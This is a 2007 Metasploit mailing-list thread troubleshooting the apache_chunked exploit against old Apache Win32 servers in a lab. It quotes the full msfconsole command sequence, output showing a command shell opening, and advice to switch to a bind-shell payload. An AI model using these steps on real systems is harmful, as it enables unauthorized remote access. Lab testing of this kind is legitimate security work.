[framework] Problem with Apache Win32 Chunked Encoding

Kurt Grutzmacher grutz at jingojango.net
Thu Nov 1 14:57:43 CDT 2007


Your PAYLOAD won't work with CMD=calc.exe.  You're exploiting a service
that doesn't have a GUI component attached and so you won't get a
response back when you fire the exploit at it.

Use a different PAYLOAD like windows/shell/bind_tcp instead.

On Thu, Nov 01, 2007 at 09:18:26AM +0100, bluefoxy wrote:
> Thank you Patrick, I tried setting VHOST, but it is not working.
> I tried both in VMware and on a real network, some error.
>
> My command list is below. Apache is at 192.168.1.80, Metasploit at
> 192.168.1.30:
>
> use windows/http/apache_chunked
> set RHOST 192.168.1.80
> set LHOST 192.168.1.30
> set VHOST 192.168.1.80
> set TARGET 4
> set CMD calc.exe
> set PAYLOAD windows/exec
> exploit
>
> Can you list your commands?
> Thanks.
>
> bluefoxy
>
>
>
> Patrick Webster wrote:
>> Are you sending traffic via a transparent proxy? You may need to set VHOST 
>> to get past it.
>>
>> Works ok here - though a different target.
>>
>> msf exploit(apache_chunked) > rcheck
>> [*] Serer is probably not vulnerable:
>> [*] The target is not exploitable.
>> msf exploit(apache_chunked) > rexploit
>> [*] Started reverse handler
>> [*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/6 ]
>> [*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/2 ]
>> [*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/0 ]
>> [*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/4 ]
>> [*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/1 ]
>> [*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/3 ]
>> [*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/5 ]
>> [*] Command shell session 1 opened (192.168.146.12:4444 -> 192.168.146.13:1050)
>>
>> -Patrick
>

-- 
                 ..:[ grutz at jingojango dot net ]:..
     GPG fingerprint: 5FD6 A27D 63DB 3319 140F  B3FB EC95 2A03 8CB3 ECB4
	"There's just no amusing way to say, 'I have a CISSP'."


